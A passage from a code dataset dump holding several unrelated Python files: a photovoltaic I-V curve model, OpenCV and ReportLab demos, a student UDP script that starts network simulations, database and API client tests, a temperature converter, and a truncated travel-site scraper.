\"\"\"Method to get the spec values for a given PV from a CSV file and\n update the associated object properties.\n \"\"\"\n for pv_spec_dict in read_pv_specs(pv_spec_csv_file):\n if pv_spec_dict[\"PV Name\"] == pv_name:\n self.apply_pv_spec_dict(pv_spec_dict)\n return\n\n assert False, \"{} does not have specs for {}\".format(pv_spec_csv_file,\n pv_name)\n\n # -------------------------------------------------------------------------\n def apply_pv_spec_dict(self, pv_spec_dict):\n \"\"\"Method to update the associated object properties from the given\n pv_spec_dict\n \"\"\"\n self.pv_name = pv_spec_dict[\"PV Name\"]\n self.voc_stc = float(pv_spec_dict[\"Voc\"])\n self.isc_stc = float(pv_spec_dict[\"Isc\"])\n self.vmp_stc = float(pv_spec_dict[\"Vmp\"])\n self.imp_stc = float(pv_spec_dict[\"Imp\"])\n self.num_cells = (None if not pv_spec_dict[\"Cells\"] else\n float(pv_spec_dict[\"Cells\"]))\n if pv_spec_dict[\"Voc temp coeff units\"] == \"%\":\n val = float(pv_spec_dict[\"Voc temp coeff\"])\n self.voc_temp_coeff_pct_per_deg = val\n else:\n val = float(pv_spec_dict[\"Voc temp coeff\"])\n self.voc_temp_coeff_mv_per_deg = val\n if pv_spec_dict[\"Isc temp coeff units\"] == \"%\":\n val = float(pv_spec_dict[\"Isc temp coeff\"])\n self.isc_temp_coeff_pct_per_deg = val\n else:\n val = float(pv_spec_dict[\"Isc temp coeff\"])\n self.isc_temp_coeff_ma_per_deg = val\n val = float(pv_spec_dict[\"MPP temp coeff\"])\n self.mpp_temp_coeff_pct_per_deg = val\n self.noct = (None if not pv_spec_dict[\"NOCT\"] else\n float(pv_spec_dict[\"NOCT\"]))\n\n # -------------------------------------------------------------------------\n def run(self):\n \"\"\"Method to run the model once it has been populated with\n the input values. Once this method has been run, the\n properties with the single-diode model parameters will\n contain their derived values and the properties for the Voc,\n Isc and MPP will also return the correct values.\n\n If the modeling fails to find a solution, an AssertionError\n exception is raised.\n\n If the \"solution\" required ignoring Equation #4 (see the\n find_parms() function), no exception is raised, but a True\n value is returned by the method.\n \"\"\"\n # pylint: disable=too-many-locals\n start_time = dt.datetime.now()\n\n # Reset the vi_points, vmp, and imp properties since they won't\n # be valid if this method is being run with new property values.\n self.vi_points = []\n self.vmp = None\n self.imp = None\n\n # Step 1: Use the temperature-adjusted Voc, Isc, and MPP to\n # find the single-diode equation parameters of the curve at the\n # specified temperature, but still at STC irradiance.\n voc_isc_vmp_imp = [self.voc_at_temp, self.isc_at_temp,\n self.vmp_at_temp, self.imp_at_temp]\n il_guess = self.isc_at_temp\n parms, results = find_parms(voc_isc_vmp_imp, il_guess,\n self.i0_guesses,\n self.a_guess,\n self.rs_guesses,\n self.rsh_guesses,\n self.err_thresh)\n il, i0, a, rs, rsh = parms\n eq1_res, eq2_res, eq3_res, eq4_res = results[0:4]\n eq5_res = test_eq5(rsh, [i0, a, rs, self.isc_at_temp])\n eq4_ignored = False\n if eq4_res == 0.0:\n eq4_res = test_eq4([self.vmp_at_temp, self.imp_at_temp],\n [i0, a, rs, rsh])\n eq4_ignored = eq4_res != 0.0\n if self.debug:\n print(\"Best solution (Step 1):\")\n print(\" IL: {}\".format(il))\n print(\" I0: {}\".format(i0))\n print(\" A: {}\".format(a))\n print(\" Rs: {}\".format(rs))\n print(\" Rsh: {}\".format(rsh))\n print(\"\\nResults:\")\n print(\" Eq1: {}\".format(eq1_res))\n print(\" Eq2: {}\".format(eq2_res))\n print(\" Eq3: {}\".format(eq3_res))\n print(\" Eq4: {}{}\".format(eq4_res, \" (Ignored)\"\n if eq4_ignored else \"\"))\n print(\" Eq5: {}\".format(eq5_res))\n self.eq1_result = eq1_res\n self.eq2_result = eq2_res\n self.eq3_result = eq3_res\n self.eq4_result = eq4_res\n self.eq5_result = eq5_res\n abs_results = [abs(res) for res in results]\n if max(abs_results) > self.err_thresh:\n if self.debug:\n print(\" *** FAILED *** ({} is > {})\".format(max(abs_results),\n self.err_thresh))\n assert_str = \"ERROR: PV modeling for {} failed to find \"\n assert_str += \"a solution\"\n assert False, assert_str.format(self.pv_name)\n\n # Step 2: Adjust for irradiance. For this model, this is\n # nothing more than scaling the IL parameter.\n il *= (self.irradiance / STC_IRRAD)\n\n # If the root-solving was successful (which it was if we have\n # gotten this far), set the property values of the five\n # parameters to the modeled values.\n self.il = il\n self.i0 = i0\n self.a = a\n self.rs = rs\n self.rsh = rsh\n\n # Update the Vmp and Imp properties\n self.update_mpp()\n\n # Record the run time\n elapsed_time = dt.datetime.now() - start_time\n self.run_ms = int(round(elapsed_time.total_seconds() * 1000))\n\n # For callers who care, the return value indicates if Eq4 was\n # ignored\n return eq4_ignored\n\n # -------------------------------------------------------------------------\n def update_mpp(self):\n \"\"\"Method to update the Vmp and Imp of the IV curve for the PV\n module/cell at the specified temperature and irradiance.\n \"\"\"\n if (self.il is None or self.i0 is None or\n self.a is None or self.rs is None or self.rsh is None):\n self.vmp = None\n self.imp = None\n else:\n vmp_guess = self.vmp_at_temp\n imp_guess = self.imp_at_temp * (self.irradiance / STC_IRRAD)\n mpp = root(test_mpp, x0=[vmp_guess, imp_guess],\n args=([self.il, self.i0, self.a,\n self.rs, self.rsh]))\n self.vmp = mpp.x[0]\n self.imp = mpp.x[1]\n\n # -------------------------------------------------------------------------\n def gen_vi_points(self, num_points):\n \"\"\"Method to generate a list of V,I points for the modeled curve. This\n generator can be run only after a successful execution of the\n run() method. Each point is yielded as a (v,i) tuple.\n \"\"\"\n mpp_added = False\n if self.voc is None:\n warnings.warn(\"No Voc. Has model been run successfully?\",\n UserWarning)\n return\n voc = self.voc\n # Number of loops is two less than num_points because MPP and\n # Voc are added\n num_loops = num_points - 2\n for ii in range(num_loops):\n # Voltage increments are proportional to the square root of\n # the point number. This results in large voltage increments\n # at the Isc end of the curve and very small voltage increments\n # at the Voc end. This gives better resolution around the\n # MPP and also on the steep tail end of the curve where\n # small voltage increments map to large current increments.\n volts = voc * (ii**0.5) / float((num_loops)**0.5)\n # Since that probably won't include the actual MPP, we\n # insert it before inserting the first point with a voltage\n # higher than Vmp.\n if volts > self.vmp and not mpp_added:\n yield self.vmp, self.imp\n mpp_added = True\n # Run root solver to determine the current for this voltage\n x0 = [self.il]\n parms = [self.il, self.i0, self.a, self.rs, self.rsh]\n sol = root(test_i_given_v_and_parms, x0, args=(volts, parms))\n if sol.success:\n amps = sol.x[0]\n if amps > 0.0:\n yield volts, amps\n else:\n warnings.warn(\"FAIL: v = {}\".format(volts), UserWarning)\n # Add the Voc\n yield voc, 0.0\n\n # -------------------------------------------------------------------------\n def add_vi_points(self, num_points):\n \"\"\"Method to add the specfied number of V,I points for the\n modeled curve to the vi_points property.\n \"\"\"\n self.vi_points = self.gen_vi_points(num_points)\n\n # -------------------------------------------------------------------------\n def print_vi_points(self, num_points):\n \"\"\"Method to print the list of V,I points. If the vi_points property\n is populated with the specified number of points, it will be\n used. Otherwise, it will be created.\n \"\"\"\n if len(self.vi_points) != num_points:\n self.add_vi_points(num_points)\n for point in self.vi_points:\n volts, amps = point\n print(\"{}, {}\".format(volts, amps))\n\n # -------------------------------------------------------------------------\n def estimate_irrad(self, measured_isc):\n \"\"\"Method to estimate irradiance, given the measured Isc value. The\n irradiance property is updated with the estimate. This method\n requires the cell_temp_c property to be valid (or at least a\n valid guess).\n \"\"\"\n temp_diff_from_stc = self.cell_temp_c - STC_T_C\n self.irradiance = (STC_IRRAD * (measured_isc /\n (self.isc_stc *\n (1.0 + temp_diff_from_stc *\n self.isc_temp_coeff_pct_per_deg /\n 100.0))))\n\n # -------------------------------------------------------------------------\n def estimate_temp_from_irrad(self, measured_isc):\n \"\"\"Method to estimate cell temperature from the irradiance, given a\n measured Isc.\n \"\"\"\n irrad = self.irradiance if self.irradiance > 0 else 0.001\n self.cell_temp_c = (((1 / ((irrad * self.isc_stc) /\n (STC_IRRAD * measured_isc))) - 1.0) /\n (self.isc_temp_coeff_pct_per_deg/100.0)) + STC_T_C\n\n # -------------------------------------------------------------------------\n def estimate_temp(self, measured_voc, measured_isc):\n \"\"\"Method to estimate temperature, given the measured Voc and Isc. The\n cell_temp_c property is updated with the estimate. This\n method requires the irradiance property to be valid (or at\n least a valid guess).\n \"\"\"\n # First, estimate temperature from Isc\n self.estimate_temp_from_irrad(measured_isc)\n # Run the model with the the temperature and irradiance estimates\n self.run()\n # Calculate temperature error based on measured and modeled Voc\n temp_err = (((measured_voc / self.voc) - 1.0) /\n (self.voc_temp_coeff_pct_per_deg/100.0))\n # Adjust temperature estimate accordingly\n self.cell_temp_c += temp_err\n\n # -------------------------------------------------------------------------\n def estimate_irrad_and_temp(self, measured_voc, measured_isc,\n temp_err_thresh):\n \"\"\"Method to estimate both irradiance and cell temperature, given\n measured values for Voc and Isc. This uses an iterative\n algorithm. The first step for each iteration is to estimate\n the irradiance using the estimate_irrad() method. This is\n based on the estimated temperature and the measured\n Isc. Initially, the estimated temperature is 45 degrees C,\n which is a typical NOCT. The temperature estimate is then\n updated by running the estimate_temp() method. The error\n between the previous end current estimated temperature is\n then calculated. The iterations continue while the error in\n the estimated temperature is greater than the specified\n threshold.\n \"\"\"\n self.cell_temp_c = 45.0 # Initial temperature estimate\n temp_err = 999999\n while abs(temp_err) > temp_err_thresh:\n # Estimate irradiance based on temperature and measured Isc\n self.estimate_irrad(measured_isc)\n # Estimate temperature based on irradiance and measured Voc\n temp_guess = self.cell_temp_c\n self.estimate_temp(measured_voc, measured_isc)\n temp_err = self.cell_temp_c - temp_guess\n\n # One last refinement of the estimated irradiance, using the\n # final estimated temperature\n self.estimate_irrad(measured_isc)\n\n\n############\n# Main #\n############\ndef main():\n \"\"\"Main function\"\"\"\n pv = PV_model()\n\n # Example: SunPower X21-345 at NOCI and NOCT\n pv.pv_name = \"SunPower X21-345\"\n pv.voc_stc = 68.2\n pv.isc_stc = 6.39\n pv.vmp_stc = 57.3\n pv.imp_stc = 6.02\n pv.num_cells = 96\n pv.voc_temp_coeff_mv_per_deg = -167.4 # mV per degree C\n pv.isc_temp_coeff_ma_per_deg = 2.9 # mA per degree C\n pv.mpp_temp_coeff_pct_per_deg = -0.29 # % per degree C\n pv.irradiance = NOC_IRRAD\n pv.cell_temp_c = 41.5 # NOCT from datasheet\n pv.debug = False\n\n # Run model. Voc, Isc, Vmp, Imp and Pmp should be close to datasheet\n # NOC values\n pv.run()\n pv.print_vi_points(100)\n print(pv.parms_string)\n print(\"Ideality factor: {}\".format(pv.ideality_factor))\n print(pv.summary_string)\n print(\"PV model time: {} ms\".format(pv.run_ms))\n\n # Now try reverse: estimate irradiance and temp from datasheet NOC\n # Voc and Isc values. They should be close to NOC irradiance and\n # temp.\n pv.estimate_irrad_and_temp(64.9, 5.16, 0.1)\n print(\"est_irrad = {} est_temp = {}\".format(pv.irradiance,\n pv.cell_temp_c))\n\n\n# Boilerplate main() call\nif __name__ == '__main__':\n main()\n","sub_path":"python/machine_scripts/iv/iv_swinger_complete/IV_Swinger_PV_model.py","file_name":"IV_Swinger_PV_model.py","file_ext":"py","file_size_in_byte":66970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"231395174","text":"import cv2\nimport numpy as np\n\nblack=np.zeros([150,200,1],dtype='uint8')#creating 3d array array of 150 widht ,200 hieght , and 1 channel\nprint(black)\nprint(black.shape)\n#cv2.imshow('Black',black)\n\none=np.ones([150,200,1],dtype='uint8')\n\n#creating image out of black array\n# cv2.imshow('black2',one)#nothing will happen with ones\n\nwhite=one*255#chanhing my array to val to 255 which is equalent to 255\n#cv2.imshow('white',white)\n# creating color array of image\ncreate_color=np.random.random_integers(low=1,high=244,size=[4608,2048,3])\ncreare_color=np.array(create_color)\nprint(create_color)\nprint ('shape of color image is',create_color.shape)\nprint('pixel value',create_color[1,2,0])\n#cv2.imshow('color image',create_color)\n# cv2.imwrite('output1.jpg',create_color)\ncv2.waitKey(5000)\ncv2.destroyAllWindows()\n","sub_path":"Python/Open_CV/creating image.py","file_name":"creating image.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"506666743","text":"'''\r\nThis script will kick off the simulations for any\r\ninitialized TruckNodes on the local network.\r\n\r\nRun on cmd as follows:\r\n>> python start.py\r\n\r\nNote that the TruckNodes must use IDs in the\r\nport range allotted to Group 1 (10100 - 10109).\r\n\r\nDevelopers: Seth Denney, Albert Wallace\r\nDate: March 2014\r\n'''\r\n\r\nfrom socket import *\r\n\r\nfor port in xrange(10100, 10110):\r\n\tsockfd = socket(AF_INET, SOCK_DGRAM)\r\n\tsockfd.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)\r\n\tsockfd.sendto('You been nuked son!', (\"\", port))\r\n","sub_path":"Auburn school projects [archive]/T. Spr 2014/5360 -- Wireless and Mobile Networks [Python]/Project 2/Archives/Current Idea/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"425869336","text":"\"\"\"\n vimish buffer\n ~~~~~~~~~~~~~\n\n simple interface to various textbuffer implementations\n\n :copyright: 2009 by Ronny Pfannschmidt\n :license: LGPL 2 or later\n\"\"\"\n\nfrom gtk import TextBuffer\n\n\nclass Buffer(object):\n def __init__(self, engine):\n self.engine = engine\n self.text_buffer = TextBuffer()\n self.bufnr = engine.add(self)\n\n @property\n def cursor(self):\n offset = self.text_buffer.get_property('cursor-position')\n offset_iter = self.text_buffer.get_iter_at_offset(offset)\n return offset_iter.get_line(), offset_iter.get_line_offset()\n\n @cursor.setter\n def cursor(self, where):\n \"\"\"\n\n :param where: tuple of (line, offset) or a fit text iterator\n \"\"\"\n if isinstance(where, tuple):\n assert len(where) == 2\n giter = self.text_buffer.get_iter_at_line_offset(*where)\n else:\n giter = where\n self.text_buffer.move_mark_by_name('insert', giter)\n\n\n @property\n def text(self):\n return self.text_buffer.get_text(\n self._start_iter(),\n self._stop_iter()\n )\n\n @text.setter\n def text(self, text):\n self.text_buffer.set_text(text)\n\n def append(self, text):\n self.text_buffer.insert(\n self._stop_iter(),\n text)\n\n def __len__(self):\n return self.text_buffer.get_line_count()\n\n def __getitem__(self, item):\n start, end = self._iter_range(item)\n res = self.text_buffer.get_slice(start, end)\n if isinstance(item, int):\n return res\n else:\n return res.splitlines(True)\n\n def __delitem__(self, item):\n start, end = self._iter_range(item)\n self.text_buffer.delete(start, end)\n\n def __setitem__(self, item, value):\n if isinstance(value, list):\n #XXX: smarter?\n value = ''.join(value)\n\n del self[item]\n\n start = self._start_iter(item)\n self.text_buffer.insert(start, value)\n\n def _start_iter(self, pos=None):\n if isinstance(pos, int):\n if pos >= len(self):\n raise IndexError\n return self._iter_at_line(pos)\n elif pos is None or pos.start is None:\n return self.text_buffer.get_start_iter()\n elif pos.start >= len(self):\n return self._stop_iter()\n else:\n return self._iter_at_line(pos.start)\n\n def _stop_iter(self, pos=None):\n if pos is None:\n return self.text_buffer.get_end_iter()\n elif isinstance(pos, int):\n # end of line iter = start of next line\n if pos+1 < len(self):\n return self._iter_at_line(pos+1)\n elif pos+1 == len(self):\n return self._stop_iter()\n else:\n raise IndexError\n else:\n if pos.stop is None:\n return self._stop_iter()\n elif pos.stop < len(self):\n return self._iter_at_line(pos.stop)\n else:\n return self._stop_iter()\n\n def _iter_range(self, slice):\n start = self._start_iter(slice)\n stop = self._stop_iter(slice)\n return start, stop\n\n def _iter_at_line(self, line):\n return self.text_buffer.get_iter_at_line(line)\n","sub_path":"vimish/buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"551942872","text":"\"\"\"\n\n test_command\n\"\"\"\nimport random\nimport string\nimport time\n\nfrom hypothesis import given, strategies as st, settings\n\nfrom aio_pyorient.handler.base import int_packer\nfrom aio_pyorient.handler.command import Query\nfrom aio_pyorient.odb_types import ODBRecord\n\n\nasync def test_select_command(db_client):\n handler = Query(\n db_client,\n f\"\"\"select from #0:1\"\"\"\n )\n await handler.send()\n response = await handler.read()\n print(\"response:\")\n for item in response:\n print(item)\n assert handler.done\n\nasync def test_create_command(db_client):\n name = st.text(alphabet=[*string.ascii_lowercase, *string.ascii_uppercase], min_size=3, max_size=25).example()\n age = st.integers(min_value=2, max_value=120).example()\n print(name, age)\n handler = Query(\n db_client,\n f\"create vertex Person SET name='{name}', age={age}, email='{name}@mail.ex'\"\n )\n await handler.send()\n response = await handler.read()\n print(\"response:\")\n print(response)\n for item in response:\n print(item)\n assert handler.done\n # db_client.spawn(test_create_command(name, age))\n # time.sleep(1)\n\nasync def test_update_command(db_client):\n age = random.randint(15, 100)\n handler = Query(\n db_client,\n f\"\"\"UPDATE #22:0 set age={age} RETURN AFTER @this\"\"\"\n )\n await handler.send()\n response = await handler.read()\n print(\"response:\")\n for item in response:\n assert isinstance(item, ODBRecord)\n assert item.id is not None\n assert handler.done\n","sub_path":"tests/test_handler/test_command.py","file_name":"test_command.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"53974705","text":"from salesking import api, resources, collection\nfrom salesking import exceptions\n\nfrom salesking.tests.base import SalesKingBaseTestCase\nfrom salesking.tests.resources import ResourceBaseTestCase\n\n\nclass MockResponse(object):\n \n def __init__(self, status_code):\n self.status_code = status_code\n self.content = u\"foo content\"\n\n\nclass ResponseExceptionsTestCase(ResourceBaseTestCase):\n \n def test_live_404_exception_thrown(self):\n clnt = api.APIClient()\n model = resources.get_model_class(\"client\", api=clnt)\n client = model(self.valid_data)\n client.__api__.base_url += \"foo\"\n \n with self.assertRaises(exceptions.NotFound):\n client = client.save()\n \n \n def test_400_fake_exception(self):\n clnt = api.APIClient()\n with self.assertRaises(exceptions.BadRequest):\n res = clnt._handle_response(MockResponse(400))\n \n def test_401_fake_exception(self):\n clnt = api.APIClient()\n with self.assertRaises(exceptions.Unauthorized):\n res = clnt._handle_response(MockResponse(401))\n \n def test_404_fake_exception(self):\n clnt = api.APIClient()\n with self.assertRaises(exceptions.NotFound):\n res = clnt._handle_response(MockResponse(404))\n \n def test_408_fake_exception(self):\n clnt = api.APIClient()\n with self.assertRaises(exceptions.BadRequest):\n res = clnt._handle_response(MockResponse(408))\n \n def test_422_fake_exception(self):\n clnt = api.APIClient()\n with self.assertRaises(exceptions.BadRequest):\n res = clnt._handle_response(MockResponse(422))\n \n def test_555_fake_exception(self):\n clnt = api.APIClient()\n with self.assertRaises(exceptions.ServerError):\n res = clnt._handle_response(MockResponse(555))\n \n ","sub_path":"salesking/tests/test_fail_responses.py","file_name":"test_fail_responses.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"512356133","text":"import sys\nimport math\ntemp = input(\"What's temperature you want to convert?: \")\ntry:\n temp = int(temp)\nexcept:\n print(\"This is not an int!\")\n sys.exit()\nunit = input(\"What's your temperature unit? (f/k/c): \")\nk = c = f = float(0)\n\nif unit.lower() == \"k\":\n f = temp * 9/5 - 459.67\n c = temp - 273.15\n k = temp\nelif unit.lower() == \"f\":\n k = (temp+ 459.67) *5/9\n c = (temp - 32) *5/9\n f = temp\nelif unit.lower() == \"c\":\n k = temp + 273.15\n f = temp * 9/5 + 32\n c = temp\n\nprint(\"K = %g \\nF = %g \\nC = %g\" %(k,f,c))","sub_path":"02 - Temperature Conventer.py","file_name":"02 - Temperature Conventer.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"433003718","text":"import io\nimport re\nimport typing\nimport pathlib\nimport sqlite3\nimport zipfile\nimport argparse\nimport itertools\nimport contextlib\nimport collections\n\nimport requests\nfrom clldutils.apilib import API\nfrom clldutils.misc import lazyproperty\nfrom clldutils.path import md5\nfrom clldutils.jsonlib import update, dump\nfrom csvw import dsv\nimport attr\n\n# DIGIS Dataverse API:\nAPI_URL = \"https://data.goettingen-research-online.de/api/\"\n\n# We exclude files in redundant sections of the precompilations when iterating over samples:\nCOL_MAP = {\n 'ELEVATION_(MAX.)': 'ELEVATION_MAX',\n 'ELEVATION_(MIN.)': 'ELEVATION_MIN',\n 'LATITUDE_(MAX.)': 'LATITUDE_MAX',\n 'LATITUDE_(MIN.)': 'LATITUDE_MIN',\n 'LONGITUDE_(MAX.)': 'LONGITUDE_MAX',\n 'LONGITUDE_(MIN.)': 'LONGITUDE_MIN',\n}\nCITATION_PATTERN = re.compile(r'\\[(?P[0-9]+)]')\n\n\ndef api_call(p):\n assert not p.startswith('/')\n return requests.get('{}{}'.format(API_URL, p))\n\n\nclass File:\n \"\"\"\n Represents one file in a dataset from dataverse.\n \"\"\"\n def __init__(self, md: dict, section: typing.Optional[str] = None):\n self.md = md\n self.section = section\n self.name = self.md['filename']\n assert self.name == self.name.strip()\n self.path = pathlib.Path(self.name)\n self.date = self.md['creationDate']\n self.md5 = self.md['md5']\n self.size = self.md['filesize']\n self.id = self.md['persistentId']\n\n def exists(self, repos: 'GEOROC') -> bool:\n \"\"\"\n Checks whether the specified file exists with correct checksum in the repository.\n \"\"\"\n p = repos.csvdir / self.name\n return p.exists() and md5(p) == self.md5\n\n def iter_lines(self, repos: 'GEOROC') -> typing.Generator[str, None, None]:\n for line in repos.csvdir.joinpath(self.name).open(encoding='cp1252'):\n if line.strip():\n yield line.strip()\n\n def iter_samples(self, repos: 'GEOROC', stdout=False) -> typing.Generator['Sample', None, None]:\n from pygeoroc import errata\n lines = itertools.takewhile(\n lambda l: not (l.startswith('Abbreviations') or l.startswith('References:')),\n self.iter_lines(repos))\n for i, row in enumerate(dsv.reader(lines, dicts=True), start=2):\n try:\n sample = Sample.from_row(row)\n except: # pragma: no cover # noqa: E722\n print('{}:{}'.format(self.name, i))\n raise\n errata.fix(sample, self, repos, stdout=stdout)\n yield sample\n\n def iter_references(\n self, repos: 'GEOROC') -> typing.Generator[typing.Tuple[int, str], None, None]:\n in_refs = False\n for line in self.iter_lines(repos):\n if in_refs:\n if line.startswith('\"'):\n line = line[1:].strip()\n if line.endswith('\"'):\n line = line[:-1].strip()\n m = re.match(r'\\[(?P[0-9]+)]\\s+(?P.+)', line)\n if m:\n yield int(m.group('id')), m.group('ref')\n\n if line.startswith('References:'):\n in_refs = True\n\n\nclass Dataset:\n def __init__(self, md: dict):\n self.md = md\n self.doi = '{}:{}/{}'.format(\n self.md['protocol'], self.md['authority'], self.md['identifier'])\n self._citation_data = {\n f['typeName']: f['value'] for f in\n self.md['latestVersion']['metadataBlocks']['citation']['fields']}\n self.name = self._citation_data['title']\n\n @classmethod\n def from_doi(cls, doi: str) -> 'Dataset':\n return cls(api_call('datasets/:persistentId/?persistentId=' + doi).json()['data'])\n\n @property\n def citation(self) -> str:\n res = ' and '.join([v['authorName']['value'] for v in self._citation_data['author']])\n res += ', {}, '.format(self._citation_data['dateOfDeposit'].split('-')[0])\n res += '\"{}\", '.format(self._citation_data['title'])\n res += '{}, '.format(self.md['persistentUrl'])\n res += '{}, '.format(self.md['publisher'])\n res += 'V{}'.format(self.md['latestVersion']['versionNumber'])\n return res\n\n @property\n def files(self) -> typing.List[File]:\n return [File(r['dataFile'], section=self.name) for r in self.md['latestVersion']['files']]\n\n def download_files(self, repos: 'GEOROC', log=None):\n # Check, whether we have to download any files:\n missing = {f.name for f in self.files if not f.exists(repos)}\n print(missing)\n if missing:\n if log:\n log.info('Downloading files for dataset \"{}\" ...'.format(self.name))\n r = api_call('access/dataset/:persistentId/?persistentId={}'.format(self.doi))\n z = zipfile.ZipFile(io.BytesIO(r.content))\n if log:\n log.info('... done')\n for name in z.namelist():\n assert name == name.strip()\n if name in missing:\n if log:\n log.info('Updating file {}'.format(name))\n repos.csvdir.joinpath(name).write_bytes(z.read(name))\n else:\n if log:\n log.info(\n 'Skipping download for dataset \"{}\". All files up-to-date.'.format(self.name))\n\n\ndef col_type(s):\n if s in [\n 'MIN._AGE_(YRS.)', # '3480000000 / 3484000000'\n 'MAX._AGE_(YRS.)', # '3480000000 / 3484000000'\n ]:\n return str\n if s in COL_MAP.values():\n return float\n if '(' in s:\n return float\n if '_' in s and re.search(r'[0-9]', s):\n return float\n return str\n\n\ndef value_and_refs(v):\n refs = set()\n\n def repl(m):\n refs.add(m.group('ref'))\n return ''\n\n return CITATION_PATTERN.sub(repl, v).strip(), refs\n\n\ndef citations_converter(s):\n v, res = value_and_refs(s)\n assert not v\n return collections.OrderedDict([(k, []) for k in res])\n\n\n@attr.s\nclass Sample:\n id = attr.ib()\n name = attr.ib()\n citations = attr.ib(converter=citations_converter)\n data = attr.ib()\n\n def __attrs_post_init__(self):\n for k, v in COL_MAP.items():\n if k in self.data:\n self.data[v] = self.data.pop(k)\n\n for k in self.data:\n v, refs = value_and_refs(self.data[k])\n for ref in refs:\n assert ref in self.citations\n self.citations[ref].append(k)\n self.data[k] = col_type(k)(v) if v else None\n\n @classmethod\n def from_row(cls, row):\n row = {k.replace(' ', '_'): v for k, v in row.items()}\n return cls(\n id=row.pop('UNIQUE_ID'),\n name=row.pop('SAMPLE_NAME'),\n citations=row.pop('CITATIONS'),\n data=row,\n )\n\n @property\n def region(self):\n return self.data.get('LOCATION', '').split(' / ')[0]\n\n\nclass GEOROC(API):\n @lazyproperty\n def converters(self):\n import importlib.util\n\n mod = self.path('converters.py')\n if mod.exists():\n spec = importlib.util.spec_from_file_location(\"pygeoroc.converters\", mod)\n mod = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(mod)\n return mod\n return argparse.Namespace(COORDINATES={}, FIELDS={}) # pragma: no cover\n\n @property\n def csvdir(self) -> pathlib.Path:\n return self.path('csv')\n\n @property\n def dbpath(self) -> pathlib.Path:\n return self.path('georoc.sqlite')\n\n def dbquery(self, sql, params=None):\n with sqlite3.connect(str(self.dbpath)) as conn:\n with contextlib.closing(conn.cursor()) as cu:\n cu.execute(sql, params or ())\n cols = [r[0] for r in cu.description]\n res = [collections.OrderedDict(zip(cols, row)) for row in cu.fetchall()]\n return res\n\n @property\n def index(self):\n with update(self.path('datasets.json'), default=[], indent=4) as data:\n return [Dataset(md) for md in data]\n\n @index.setter\n def index(self, datasets):\n dump(datasets, self.path('datasets.json'), indent=4)\n\n def iter_files(self):\n for ds in self.index:\n yield from ds.files\n\n def iter_references(self):\n refs = {}\n for f in self.iter_files():\n for id_, ref in f.iter_references(self):\n if id_ not in refs:\n yield id_, ref\n refs[id_] = ref\n else:\n assert refs[id_] == ref # pragma: no cover\n\n def iter_samples(self):\n sids = set()\n for f in self.iter_files():\n for sample in f.iter_samples(self):\n if sample.id not in sids:\n yield sample, f\n sids.add(sample.id)\n","sub_path":"src/pygeoroc/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"333517048","text":"#http://www.devshed.com/c/a/Python/Python-for-PDF-Generation/#whoCFCPh3TAks368.99\n\n# #Insert single Strings\n# from reportlab.pdfgen.canvas import Canvas\n# from reportlab.lib.units import cm, mm, inch, pica\n# pdf = Canvas(\"test001.pdf\")\n# pdf.setFont(\"Courier\", 12)\n# pdf.setStrokeColorRGB(1, 0, 0)\n# pdf.drawString(300, 300, \"CLASSIFIED\")\n# pdf.drawString(2 * inch, inch, \"For Your Eyes Only\")\n# pdf.showPage()\n# pdf.save()\n\n\n#Insert line after line\nfrom reportlab.pdfgen.canvas import Canvas\nfrom reportlab.lib.units import cm, mm, inch, pica\npdf = Canvas(\"test002.pdf\")\nrhyme = pdf.beginText(inch * 1, inch * 10)\nrhyme.textLine('Humpty Dumpty sat on a wall.')\nrhyme.textLine('Humpty Dumpty had a great fall.')\nrhyme.textLine('All the king’s horses and all the king’s men')\nrhyme.textLine('couldn’t put Humpty together again.')\npdf.drawText(rhyme)\npdf.showPage()\npdf.save()\n\n\n\n\n","sub_path":"reportLab.py","file_name":"reportLab.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"31058844","text":"# -*- coding: utf-8 -*-\nimport time\nimport urllib.parse\nimport re\n\nimport requests\nfrom requests import RequestException\nfrom pyquery import PyQuery as pq\n\ncsv_file_name = \"./data/city_list.csv\"\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'}\n\n\ndef get_places_playtime(titles):\n places_play_time = []\n for title in titles:\n # print(title)\n play_time = get_play_time(title)\n time.sleep(2)\n places_play_time.append(play_time)\n return places_play_time\n\n\ndef get_time(play_time_str):\n play_time_int = str_2_int(play_time_str)\n return play_time_int\n\n\ndef get_play_time(title):\n url_code_title = urllib.parse.quote(title)\n search_url = 'https://travel.qunar.com/search/all/' + url_code_title\n html = get_html(search_url)\n if html:\n play_time_str = parse_place_html(html)\n play_time = get_time(play_time_str)\n return play_time\n\n\ndef get_html(url):\n try:\n response = requests.get(url, headers=headers, timeout=10)\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n return None\n\n\ndef parse_place_html(html):\n doc = pq(html)\n divs = doc('.d_days').items()\n if doc('.d_days'):\n for div in divs:\n # print(div.text())\n return div.text()\n else:\n divs = doc('.sc_info').items()\n for div in divs:\n p = div('.days')\n # print(p.text())\n return div('.days').text()\n\n\ndef str_2_int(string):\n # 模板: 建议游玩时间:??小时( - ??小时)\n # 1.取出所有数字求平均(double型)\n # 